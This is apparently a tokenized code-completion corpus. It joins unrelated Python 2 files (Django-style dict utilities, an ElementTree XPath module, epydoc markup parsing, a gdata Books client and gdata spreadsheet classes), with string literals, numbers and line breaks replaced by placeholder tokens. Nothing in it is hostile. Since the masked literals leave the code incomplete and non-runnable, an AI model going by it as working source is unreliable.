"""<STR_LIT>""" <EOL> try : <EOL> val = self [ key ] <EOL> except KeyError : <EOL> return default <EOL> if val == [ ] : <EOL> return default <EOL> return val <EOL> def getlist ( self , key ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return super ( MultiValueDict , self ) . __getitem__ ( key ) <EOL> except KeyError : <EOL> return [ ] <EOL> def setlist ( self , key , list_ ) : <EOL> super ( MultiValueDict , self ) . __setitem__ ( key , list_ ) <EOL> def setdefault ( self , key , default = None ) : <EOL> if key not in self : <EOL> self [ key ] = default <EOL> return self [ key ] <EOL> def setlistdefault ( self , key , default_list = ( ) ) : <EOL> if key not in self : <EOL> self . setlist ( key , default_list ) <EOL> return self . getlist ( key ) <EOL> def appendlist ( self , key , value ) : <EOL> """<STR_LIT>""" <EOL> self . setlistdefault ( key , [ ] ) <EOL> super ( MultiValueDict , self ) . __setitem__ ( key , self . getlist ( key ) + [ value ] ) <EOL> def items ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ( key , self [ key ] ) for key in self . keys ( ) ] <EOL> def iteritems ( self ) : <EOL> """<STR_LIT>""" <EOL> for key in self . keys ( ) : <EOL> yield ( key , self [ key ] ) <EOL> def lists ( self ) : <EOL> """<STR_LIT>""" <EOL> return super ( MultiValueDict , self ) . items ( ) <EOL> def iterlists ( self ) : <EOL> """<STR_LIT>""" <EOL> return super ( MultiValueDict , self ) . iteritems ( ) <EOL> def values ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ self [ key ] for key in self . keys ( ) ] <EOL> def itervalues ( self ) : <EOL> """<STR_LIT>""" <EOL> for key in self . iterkeys ( ) : <EOL> yield self [ key ] <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __deepcopy__ ( ) <EOL> def update ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if len ( args ) > <NUM_LIT:1> : <EOL> raise TypeError , "<STR_LIT>" % len ( args ) <EOL> if args : <EOL> other_dict = args [ <NUM_LIT:0> ] <EOL> if isinstance ( other_dict , MultiValueDict ) : <EOL> for key , value_list in other_dict . lists ( ) : <EOL> self . setlistdefault ( key , [ ] ) . extend ( value_list ) <EOL> else : <EOL> try : <EOL> for key , value in other_dict . items ( ) : <EOL> self . setlistdefault ( key , [ ] ) . append ( value ) <EOL> except TypeError : <EOL> raise ValueError , "<STR_LIT>" <EOL> for key , value in kwargs . iteritems ( ) : <EOL> self . setlistdefault ( key , [ ] ) . append ( value ) <EOL> class DotExpandedDict ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , key_to_list_mapping ) : <EOL> for k , v in key_to_list_mapping . items ( ) : <EOL> current = self <EOL> bits = k . split ( '<STR_LIT:.>' ) <EOL> for bit in bits [ : - <NUM_LIT:1> ] : <EOL> current = current . setdefault ( bit , { } ) <EOL> try : <EOL> current [ bits [ - <NUM_LIT:1> ] ] = v <EOL> except TypeError : <EOL> current = { bits [ - <NUM_LIT:1> ] : v } <EOL> class ImmutableList ( tuple ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> if '<STR_LIT>' in kwargs : <EOL> warning = kwargs [ '<STR_LIT>' ] <EOL> del kwargs [ '<STR_LIT>' ] <EOL> else : <EOL> warning = '<STR_LIT>' <EOL> self = tuple . __new__ ( cls , * args , ** kwargs ) <EOL> self . warning = warning <EOL> return self <EOL> def complain ( self , * wargs , ** kwargs ) : <EOL> if isinstance ( self . warning , Exception ) : <EOL> raise self . warning <EOL> else : <EOL> raise AttributeError , self . warning <EOL> __delitem__ = complain <EOL> __delslice__ = complain <EOL> __iadd__ = complain <EOL> __imul__ = complain <EOL> __setitem__ = complain <EOL> __setslice__ = complain <EOL> append = complain <EOL> extend = complain <EOL> insert = complain <EOL> pop = complain <EOL> remove = complain <EOL> sort = complain <EOL> reverse = complain <EOL> class DictWrapper ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data , func , prefix ) : <EOL> super ( DictWrapper , self ) . __init__ ( data ) <EOL> self . func = func <EOL> self . prefix = prefix <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if key . startswith ( self . prefix ) : <EOL> use_func = True <EOL> key = key [ len ( self . prefix ) : ] <EOL> else : <EOL> use_func = False <EOL> value = super ( DictWrapper , self ) . __getitem__ ( key ) <EOL> if use_func : <EOL> return self . func ( value ) <EOL> return value </s>
<s> import re <EOL> xpath_tokenizer = re . compile ( <EOL> "<STR_LIT:(>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) . findall <EOL> def prepare_tag ( next , token ) : <EOL> tag = token [ <NUM_LIT:1> ] <EOL> def select ( context , result ) : <EOL> for elem in result : <EOL> for e in elem : <EOL> if e . tag == tag : <EOL> yield e <EOL> return select <EOL> def prepare_star ( next , token ) : <EOL> def select ( context , result ) : <EOL> for elem in result : <EOL> for e in elem : <EOL> yield e <EOL> return select <EOL> def prepare_dot ( next , token ) : <EOL> def select ( context , result ) : <EOL> for elem in result : <EOL> yield elem <EOL> return select <EOL> def prepare_iter ( next , token ) : <EOL> token = next ( ) <EOL> if token [ <NUM_LIT:0> ] == "<STR_LIT:*>" : <EOL> tag = "<STR_LIT:*>" <EOL> elif not token [ <NUM_LIT:0> ] : <EOL> tag = token [ <NUM_LIT:1> ] <EOL> else : <EOL> raise SyntaxError <EOL> def select ( context , result ) : <EOL> for elem in result : <EOL> for e in elem . iter ( tag ) : <EOL> if e is not elem : <EOL> yield e <EOL> return select <EOL> def prepare_dot_dot ( next , token ) : <EOL> def select ( context , result ) : <EOL> parent_map = context . parent_map <EOL> if parent_map is None : <EOL> context . parent_map = parent_map = { } <EOL> for p in context . root . iter ( ) : <EOL> for e in p : <EOL> parent_map [ e ] = p <EOL> for elem in result : <EOL> if elem in parent_map : <EOL> yield parent_map [ elem ] <EOL> return select <EOL> def prepare_predicate ( next , token ) : <EOL> token = next ( ) <EOL> if token [ <NUM_LIT:0> ] == "<STR_LIT:@>" : <EOL> token = next ( ) <EOL> if token [ <NUM_LIT:0> ] : <EOL> raise SyntaxError ( "<STR_LIT>" ) <EOL> key = token [ <NUM_LIT:1> ] <EOL> token = next ( ) <EOL> if token [ <NUM_LIT:0> ] == "<STR_LIT:]>" : <EOL> def select ( context , result ) : <EOL> for elem in result : <EOL> if elem . get ( key ) is not None : <EOL> yield elem <EOL> elif token [ <NUM_LIT:0> ] == "<STR_LIT:=>" : <EOL> value = next ( ) [ <NUM_LIT:0> ] <EOL> if value [ : <NUM_LIT:1> ] == "<STR_LIT:'>" or value [ : <NUM_LIT:1> ] == '<STR_LIT:">' : <EOL> value = value [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> else : <EOL> raise SyntaxError ( "<STR_LIT>" ) <EOL> token = next ( ) <EOL> def select ( context , result ) : <EOL> for elem in result : <EOL> if elem . get ( key ) == value : <EOL> yield elem <EOL> if token [ <NUM_LIT:0> ] != "<STR_LIT:]>" : <EOL> raise SyntaxError ( "<STR_LIT>" ) <EOL> elif not token [ <NUM_LIT:0> ] : <EOL> tag = token [ <NUM_LIT:1> ] <EOL> token = next ( ) <EOL> if token [ <NUM_LIT:0> ] != "<STR_LIT:]>" : <EOL> raise SyntaxError ( "<STR_LIT>" ) <EOL> def select ( context , result ) : <EOL> for elem in result : <EOL> if elem . find ( tag ) is not None : <EOL> yield elem <EOL> else : <EOL> raise SyntaxError ( "<STR_LIT>" ) <EOL> return select <EOL> ops = { <EOL> "<STR_LIT>" : prepare_tag , <EOL> "<STR_LIT:*>" : prepare_star , <EOL> "<STR_LIT:.>" : prepare_dot , <EOL> "<STR_LIT:..>" : prepare_dot_dot , <EOL> "<STR_LIT>" : prepare_iter , <EOL> "<STR_LIT:[>" : prepare_predicate , <EOL> } <EOL> _cache = { } <EOL> class _SelectorContext : <EOL> parent_map = None <EOL> def __init__ ( self , root ) : <EOL> self . root = root <EOL> def find ( elem , path ) : <EOL> try : <EOL> return findall ( elem , path ) . next ( ) <EOL> except StopIteration : <EOL> return None <EOL> def findall ( elem , path ) : <EOL> try : <EOL> selector = _cache [ path ] <EOL> except KeyError : <EOL> if len ( _cache ) > <NUM_LIT:100> : <EOL> _cache . clear ( ) <EOL> if path [ : <NUM_LIT:1> ] == "<STR_LIT:/>" : <EOL> raise SyntaxError ( "<STR_LIT>" ) <EOL> stream = iter ( xpath_tokenizer ( path ) ) <EOL> next = stream . next ; token = next ( ) <EOL> selector = [ ] <EOL> while <NUM_LIT:1> : <EOL> try : <EOL> selector . append ( ops [ token [ <NUM_LIT:0> ] ] ( next , token ) ) <EOL> except StopIteration : <EOL> raise SyntaxError ( "<STR_LIT>" ) <EOL> try : <EOL> token = next ( ) <EOL> if token [ <NUM_LIT:0> ] == "<STR_LIT:/>" : <EOL> token = next ( ) <EOL> except StopIteration : <EOL> break <EOL> _cache [ path ] = selector <EOL> result = [ elem ] <EOL> context = _SelectorContext ( elem ) <EOL> for select in selector : <EOL> result = select ( context , result ) <EOL> return result <EOL> def findtext ( elem , path , default = None ) : <EOL> try : <EOL> elem = findall ( elem , path ) . next ( ) <EOL> return elem . text <EOL> except StopIteration : <EOL> return default </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = '<STR_LIT>' <EOL> import re , types , sys <EOL> from epydoc import log <EOL> from epydoc . util import plaintext_to_html , plaintext_to_latex <EOL> import epydoc <EOL> from epydoc . compat import * <EOL> _markup_language_registry = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def register_markup_language ( name , parse_function ) : <EOL> """<STR_LIT>""" <EOL> _markup_language_registry [ name . lower ( ) ] = parse_function <EOL> MARKUP_LANGUAGES_USED = set ( ) <EOL> def parse ( docstring , markup = '<STR_LIT>' , errors = None , ** options ) : <EOL> """<STR_LIT>""" <EOL> raise_on_error = ( errors is None ) <EOL> if errors == None : errors = [ ] <EOL> markup = markup . lower ( ) <EOL> if not re . match ( r'<STR_LIT>' , markup ) : <EOL> _parse_warn ( '<STR_LIT>' <EOL> '<STR_LIT>' % markup ) <EOL> import epydoc . markup . plaintext as plaintext <EOL> return plaintext . parse_docstring ( docstring , errors , ** options ) <EOL> if markup not in _markup_language_registry : <EOL> _parse_warn ( '<STR_LIT>' <EOL> '<STR_LIT>' % markup ) <EOL> import epydoc . markup . plaintext as plaintext <EOL> return plaintext . parse_docstring ( docstring , errors , ** options ) <EOL> parse_docstring = _markup_language_registry [ markup ] <EOL> if isinstance ( parse_docstring , basestring ) : <EOL> try : exec ( '<STR_LIT>' % parse_docstring ) <EOL> except ImportError , e : <EOL> _parse_warn ( '<STR_LIT>' % <EOL> ( parse_docstring , markup , e ) ) <EOL> import epydoc . markup . plaintext as plaintext <EOL> return plaintext . parse_docstring ( docstring , errors , ** options ) <EOL> _markup_language_registry [ markup ] = parse_docstring <EOL> MARKUP_LANGUAGES_USED . add ( markup ) <EOL> try : parsed_docstring = parse_docstring ( docstring , errors , ** options ) <EOL> except KeyboardInterrupt : raise <EOL> except Exception , e : <EOL> if epydoc . DEBUG : raise <EOL> log . error ( '<STR_LIT>' <EOL> '<STR_LIT>' % e ) <EOL> import epydoc . markup . plaintext as plaintext <EOL> return plaintext . parse_docstring ( docstring , errors , ** options ) <EOL> fatal_errors = [ e for e in errors if e . is_fatal ( ) ] <EOL> if fatal_errors and raise_on_error : raise fatal_errors [ <NUM_LIT:0> ] <EOL> if fatal_errors : <EOL> import epydoc . markup . plaintext as plaintext <EOL> return plaintext . parse_docstring ( docstring , errors , ** options ) <EOL> return parsed_docstring <EOL> _parse_warnings = { } <EOL> def _parse_warn ( estr ) : <EOL> """<STR_LIT>""" <EOL> global _parse_warnings <EOL> if estr in _parse_warnings : return <EOL> _parse_warnings [ estr ] = <NUM_LIT:1> <EOL> log . warning ( estr ) <EOL> class ParsedDocstring : <EOL> """<STR_LIT>""" <EOL> def split_fields ( self , errors = None ) : <EOL> """<STR_LIT>""" <EOL> return self , [ ] <EOL> def summary ( self ) : <EOL> """<STR_LIT>""" <EOL> return self , False <EOL> def concatenate ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return ConcatenatedDocstring ( self , other ) <EOL> def __add__ ( self , other ) : return self . concatenate ( other ) <EOL> def to_html ( self , docstring_linker , ** options ) : <EOL> """<STR_LIT>""" <EOL> plaintext = plaintext_to_html ( self . to_plaintext ( docstring_linker ) ) <EOL> return '<STR_LIT>' % plaintext <EOL> def to_latex ( self , docstring_linker , ** options ) : <EOL> """<STR_LIT>""" <EOL> plaintext = plaintext_to_latex ( self . to_plaintext ( docstring_linker ) ) <EOL> return '<STR_LIT>' % plaintext <EOL> def to_plaintext ( self , docstring_linker , ** options ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError , '<STR_LIT>' <EOL> def index_terms ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ] <EOL> class ConcatenatedDocstring : <EOL> def __init__ ( self , * parsed_docstrings ) : <EOL> self . _parsed_docstrings = [ pds for pds in parsed_docstrings <EOL> if pds is not None ] <EOL> def split_fields ( self , errors = None ) : <EOL> bodies = [ ] <EOL> fields = [ ] <EOL> for doc in self . _parsed_docstrings : <EOL> b , f = doc . split_fields ( ) <EOL> bodies . append ( b ) <EOL> fields . extend ( f ) <EOL> return ConcatenatedDocstring ( * bodies ) , fields <EOL> def summary ( self ) : <EOL> return self . _parsed_docstrings [ <NUM_LIT:0> ] . summary ( ) <EOL> def to_html ( self , docstring_linker , ** options ) : <EOL> htmlstring = '<STR_LIT>' <EOL> for doc in self . _parsed_docstrings : <EOL> htmlstring += doc . to_html ( docstring_linker , ** options ) <EOL> return htmlstring <EOL> def to_latex ( self , docstring_linker , ** options ) : <EOL> latexstring = '<STR_LIT>' <EOL> for doc in self . _parsed_docstrings : <EOL> latexstring += doc . to_latex ( docstring_linker , ** options ) <EOL> return latexstring <EOL> def to_plaintext ( self , docstring_linker , ** options ) : <EOL> textstring = '<STR_LIT>' <EOL> for doc in self . _parsed_docstrings : <EOL> textstring += doc . to_plaintext ( docstring_linker , ** options ) <EOL> return textstring <EOL> def index_terms ( self ) : <EOL> terms = [ ] <EOL> for doc in self . _parsed_docstrings : <EOL> terms += doc . index_terms ( ) <EOL> return terms <EOL> class Field : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tag , arg , body ) : <EOL> self . _tag = tag . lower ( ) . strip ( ) <EOL> if arg is None : self . _arg = None <EOL> else : self . _arg = arg . strip ( ) <EOL> self . _body = body <EOL> def tag ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _tag <EOL> def arg ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _arg <EOL> def body ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _body <EOL> def __repr__ ( self ) : <EOL> if self . _arg is None : <EOL> return '<STR_LIT>' % self . _tag <EOL> else : <EOL> return '<STR_LIT>' % ( self . _tag , self . _arg ) <EOL> class DocstringLinker : <EOL> """<STR_LIT>""" <EOL> def translate_indexterm ( self , indexterm ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def translate_identifier_xref ( self , identifier , label = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def url_for ( self , identifier ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> class ParseError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , descr , linenum = None , is_fatal = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> self . _descr = descr <EOL> self . _linenum = linenum <EOL> self . _fatal = is_fatal <EOL> self . _offset = <NUM_LIT:1> <EOL> def is_fatal ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _fatal <EOL> def linenum ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _linenum is None : return None <EOL> else : return self . _offset + self . _linenum <EOL> def set_linenum_offset ( self , offset ) : <EOL> """<STR_LIT>""" <EOL> self . _offset = offset <EOL> def descr ( self ) : <EOL> return self . _descr <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _linenum is not None : <EOL> return '<STR_LIT>' % ( self . _linenum + self . _offset , self . descr ( ) ) <EOL> else : <EOL> return self . descr ( ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _linenum is None : <EOL> return '<STR_LIT>' % self . _offset <EOL> else : <EOL> return '<STR_LIT>' % ( self . _linenum + self . _offset ) <EOL> def __cmp__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( other , ParseError ) : return - <NUM_LIT:1000> <EOL> return cmp ( self . _linenum + self . _offset , <EOL> other . _linenum + other . _offset ) <EOL> def parse_type_of ( obj ) : <EOL> """<STR_LIT>""" <EOL> from epydoc . markup . epytext import ParsedEpytextDocstring <EOL> from xml . dom . minidom import Document <EOL> doc = Document ( ) <EOL> epytext = doc . createElement ( '<STR_LIT>' ) <EOL> para = doc . createElement ( '<STR_LIT>' ) <EOL> doc . appendChild ( epytext ) <EOL> epytext . appendChild ( para ) <EOL> if type ( obj ) is types . InstanceType : <EOL> link = doc . createElement ( '<STR_LIT>' ) <EOL> name = doc . createElement ( '<STR_LIT:name>' ) <EOL> target = doc . createElement ( '<STR_LIT:target>' ) <EOL> para . appendChild ( link ) <EOL> link . appendChild ( name ) <EOL> link . appendChild ( target ) <EOL> name . appendChild ( doc . createTextNode ( str ( obj . __class__ . __name__ ) ) ) <EOL> target . appendChild ( doc . createTextNode ( str ( obj . __class__ ) ) ) <EOL> else : <EOL> code = doc . createElement ( '<STR_LIT:code>' ) <EOL> para . appendChild ( code ) <EOL> code . appendChild ( doc . createTextNode ( type ( obj ) . __name__ ) ) <EOL> return ParsedEpytextDocstring ( doc ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> __revision__ = "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> __author__ = "<STR_LIT>" <EOL> __copyright__ = "<STR_LIT>" <EOL> from shlex import split <EOL> import gdata . service <EOL> try : <EOL> import books <EOL> except ImportError : <EOL> import gdata . books as books <EOL> BOOK_SERVER = "<STR_LIT>" <EOL> GENERAL_FEED = "<STR_LIT>" <EOL> ITEM_FEED = "<STR_LIT>" <EOL> LIBRARY_FEED = "<STR_LIT>" <EOL> ANNOTATION_FEED = "<STR_LIT>" <EOL> PARTNER_FEED = "<STR_LIT>" <EOL> BOOK_SERVICE = "<STR_LIT>" <EOL> ACCOUNT_TYPE = "<STR_LIT>" <EOL> class BookService ( gdata . service . GDataService ) : <EOL> def __init__ ( self , email = None , password = None , source = None , <EOL> server = BOOK_SERVER , account_type = ACCOUNT_TYPE , <EOL> exception_handlers = tuple ( ) , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> gdata . service . GDataService . __init__ ( self , email = email , <EOL> password = password , service = BOOK_SERVICE , source = source , <EOL> server = server , ** kwargs ) <EOL> self . exception_handlers = exception_handlers <EOL> def search ( self , q , start_index = "<STR_LIT:1>" , max_results = "<STR_LIT>" , <EOL> min_viewability = "<STR_LIT:none>" , feed = GENERAL_FEED , <EOL> converter = books . BookFeed . FromString ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( q , gdata . service . Query ) : <EOL> q = gdata . service . Query ( text_query = q ) <EOL> if feed : <EOL> q . feed = feed <EOL> q [ '<STR_LIT>' ] = start_index <EOL> q [ '<STR_LIT>' ] = max_results <EOL> q [ '<STR_LIT>' ] = min_viewability <EOL> return self . Get ( uri = q . ToUri ( ) , converter = converter ) <EOL> def search_by_keyword ( self , q = '<STR_LIT>' , feed = GENERAL_FEED , start_index = "<STR_LIT:1>" , <EOL> max_results = "<STR_LIT>" , min_viewability = "<STR_LIT:none>" , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for k , v in kwargs . items ( ) : <EOL> if not v : <EOL> continue <EOL> k = k . lower ( ) <EOL> if k == '<STR_LIT>' : <EOL> q = "<STR_LIT>" % ( q , v ) <EOL> elif k == '<STR_LIT>' : <EOL> q = '<STR_LIT>' % ( q , v . strip ( '<STR_LIT:">' ) ) <EOL> elif k == '<STR_LIT>' : <EOL> q = '<STR_LIT>' % ( q , '<STR_LIT:U+0020>' . join ( '<STR_LIT>' % x for x in split ( v ) ) ) <EOL> elif k == '<STR_LIT>' : <EOL> q = '<STR_LIT>' % ( q , '<STR_LIT:U+0020>' . join ( '<STR_LIT>' % x for x in split ( v ) ) ) <EOL> elif k in ( '<STR_LIT>' , '<STR_LIT:title>' , '<STR_LIT>' ) : <EOL> q = '<STR_LIT>' % ( q , '<STR_LIT:U+0020>' . join ( '<STR_LIT>' % ( k , x ) for x in split ( v ) ) ) <EOL> elif k == '<STR_LIT>' : <EOL> q = '<STR_LIT>' % ( q , '<STR_LIT:U+0020>' . join ( '<STR_LIT>' % ( k , x ) for x in split ( v ) ) ) <EOL> elif k == '<STR_LIT>' : <EOL> q = '<STR_LIT>' % ( q , v ) <EOL> elif k == '<STR_LIT>' : <EOL> q = '<STR_LIT>' % ( q , v ) <EOL> elif k == '<STR_LIT>' : <EOL> q = '<STR_LIT>' % ( q , v ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return self . search ( q . strip ( ) , start_index = start_index , feed = feed , <EOL> max_results = max_results , <EOL> min_viewability = min_viewability ) <EOL> def search_library ( self , q , id = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in kwargs : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> feed = LIBRARY_FEED % id <EOL> return self . search ( q , feed = feed , ** kwargs ) <EOL> def search_library_by_keyword ( self , id = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in kwargs : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> feed = LIBRARY_FEED % id <EOL> return self . search_by_keyword ( feed = feed , ** kwargs ) <EOL> def search_annotations ( self , q , id = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in kwargs : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> feed = ANNOTATION_FEED % id <EOL> return self . search ( q , feed = feed , ** kwargs ) <EOL> def search_annotations_by_keyword ( self , id = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in kwargs : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> feed = ANNOTATION_FEED % id <EOL> return self . search_by_keyword ( feed = feed , ** kwargs ) <EOL> def add_item_to_library ( self , item ) : <EOL> """<STR_LIT>""" <EOL> feed = LIBRARY_FEED % '<STR_LIT>' <EOL> return self . Post ( data = item , uri = feed , converter = books . Book . FromString ) <EOL> def remove_item_from_library ( self , item ) : <EOL> """<STR_LIT>""" <EOL> return self . Delete ( item . GetEditLink ( ) . href ) <EOL> def add_annotation ( self , item ) : <EOL> """<STR_LIT>""" <EOL> return self . Post ( data = item , uri = ANNOTATION_FEED % '<STR_LIT>' , <EOL> converter = books . Book . FromString ) <EOL> def edit_annotation ( self , item ) : <EOL> """<STR_LIT>""" <EOL> return self . Put ( data = item , uri = item . GetEditLink ( ) . href , <EOL> converter = books . Book . FromString ) <EOL> def get_by_google_id ( self , id ) : <EOL> return self . Get ( ITEM_FEED + id , converter = books . Book . FromString ) <EOL> def get_library ( self , id = '<STR_LIT>' , feed = LIBRARY_FEED , start_index = "<STR_LIT:1>" , <EOL> max_results = "<STR_LIT:100>" , min_viewability = "<STR_LIT:none>" , <EOL> converter = books . BookFeed . FromString ) : <EOL> """<STR_LIT>""" <EOL> q = gdata . service . Query ( ) <EOL> q . feed = feed % id <EOL> q [ '<STR_LIT>' ] = start_index <EOL> q [ '<STR_LIT>' ] = max_results <EOL> q [ '<STR_LIT>' ] = min_viewability <EOL> x = self . Get ( uri = q . ToUri ( ) , converter = converter ) <EOL> while <NUM_LIT:1> : <EOL> for entry in x . entry : <EOL> yield entry <EOL> else : <EOL> l = x . GetNextLink ( ) <EOL> if l : <EOL> x = self . Get ( uri = l . href , converter = converter ) <EOL> else : <EOL> break <EOL> def get_annotations ( self , id = '<STR_LIT>' , start_index = "<STR_LIT:1>" , max_results = "<STR_LIT:100>" , <EOL> min_viewability = "<STR_LIT:none>" , converter = books . BookFeed . FromString ) : <EOL> """<STR_LIT>""" <EOL> return self . get_library ( id = id , feed = ANNOTATION_FEED , <EOL> max_results = max_results , min_viewability = min_viewability , <EOL> converter = converter ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> try : <EOL> from xml . etree import cElementTree as ElementTree <EOL> except ImportError : <EOL> try : <EOL> import cElementTree as ElementTree <EOL> except ImportError : <EOL> try : <EOL> from xml . etree import ElementTree <EOL> except ImportError : <EOL> from elementtree import ElementTree <EOL> import atom <EOL> import gdata <EOL> import re <EOL> import string <EOL> GSPREADSHEETS_NAMESPACE = '<STR_LIT>' <EOL> GSPREADSHEETS_TEMPLATE = '<STR_LIT>' <EOL> GSPREADSHEETS_EXTENDED_NAMESPACE = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> GSPREADSHEETS_EXTENDED_TEMPLATE = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class ColCount ( atom . AtomBase ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = GSPREADSHEETS_NAMESPACE <EOL> _children = atom . AtomBase . _children . copy ( ) <EOL> _attributes = atom . AtomBase . _attributes . copy ( ) <EOL> def __init__ ( self , text = None , extension_elements = None , <EOL> extension_attributes = None ) : <EOL> self . text = text <EOL> self . extension_elements = extension_elements or [ ] <EOL> self . extension_attributes = extension_attributes or { } <EOL> def ColCountFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( ColCount , xml_string ) <EOL> class RowCount ( atom . AtomBase ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = GSPREADSHEETS_NAMESPACE <EOL> _children = atom . AtomBase . _children . copy ( ) <EOL> _attributes = atom . AtomBase . _attributes . copy ( ) <EOL> def __init__ ( self , text = None , extension_elements = None , <EOL> extension_attributes = None ) : <EOL> self . text = text <EOL> self . extension_elements = extension_elements or [ ] <EOL> self . extension_attributes = extension_attributes or { } <EOL> def RowCountFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( RowCount , xml_string ) <EOL> class Cell ( atom . AtomBase ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = GSPREADSHEETS_NAMESPACE <EOL> _children = atom . AtomBase . _children . copy ( ) <EOL> _attributes = atom . AtomBase . _attributes . copy ( ) <EOL> _attributes [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> _attributes [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> _attributes [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> _attributes [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> def __init__ ( self , text = None , row = None , col = None , inputValue = None , <EOL> numericValue = None , extension_elements = None , extension_attributes = None ) : <EOL> self . text = text <EOL> self . row = row <EOL> self . col = col <EOL> self . inputValue = inputValue <EOL> self . numericValue = numericValue <EOL> self . extension_elements = extension_elements or [ ] <EOL> self . extension_attributes = extension_attributes or { } <EOL> def CellFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( Cell , xml_string ) <EOL> class Custom ( atom . AtomBase ) : <EOL> """<STR_LIT>""" <EOL> _namespace = GSPREADSHEETS_EXTENDED_NAMESPACE <EOL> _children = atom . AtomBase . _children . copy ( ) <EOL> _attributes = atom . AtomBase . _attributes . copy ( ) <EOL> def __init__ ( self , column = None , text = None , extension_elements = None , <EOL> extension_attributes = None ) : <EOL> self . column = column <EOL> self . text = text <EOL> self . extension_elements = extension_elements or [ ] <EOL> self . extension_attributes = extension_attributes or { } <EOL> def _BecomeChildElement ( self , tree ) : <EOL> new_child = ElementTree . Element ( '<STR_LIT>' ) <EOL> tree . append ( new_child ) <EOL> new_child . tag = '<STR_LIT>' % ( self . __class__ . _namespace , <EOL> self . column ) <EOL> self . _AddMembersToElementTree ( new_child ) <EOL> def _ToElementTree ( self ) : <EOL> new_tree = ElementTree . Element ( '<STR_LIT>' % ( self . __class__ . _namespace , <EOL> self . column ) ) <EOL> self . _AddMembersToElementTree ( new_tree ) <EOL> return new_tree <EOL> def _HarvestElementTree ( self , tree ) : <EOL> namespace_uri , local_tag = string . split ( tree . tag [ <NUM_LIT:1> : ] , "<STR_LIT:}>" , <NUM_LIT:1> ) <EOL> self . column = local_tag <EOL> for child in tree : <EOL> self . _ConvertElementTreeToMember ( child ) <EOL> for attribute , value in tree . attrib . iteritems ( ) : <EOL> self . _ConvertElementAttributeToMember ( attribute , value ) <EOL> self . text = tree . text <EOL> def CustomFromString ( xml_string ) : <EOL> element_tree = ElementTree . fromstring ( xml_string ) <EOL> return _CustomFromElementTree ( element_tree ) <EOL> def _CustomFromElementTree ( element_tree ) : <EOL> namespace_uri , local_tag = string . split ( element_tree . tag [ <NUM_LIT:1> : ] , "<STR_LIT:}>" , <NUM_LIT:1> ) <EOL> if namespace_uri == GSPREADSHEETS_EXTENDED_NAMESPACE : <EOL> new_custom = Custom ( ) <EOL> 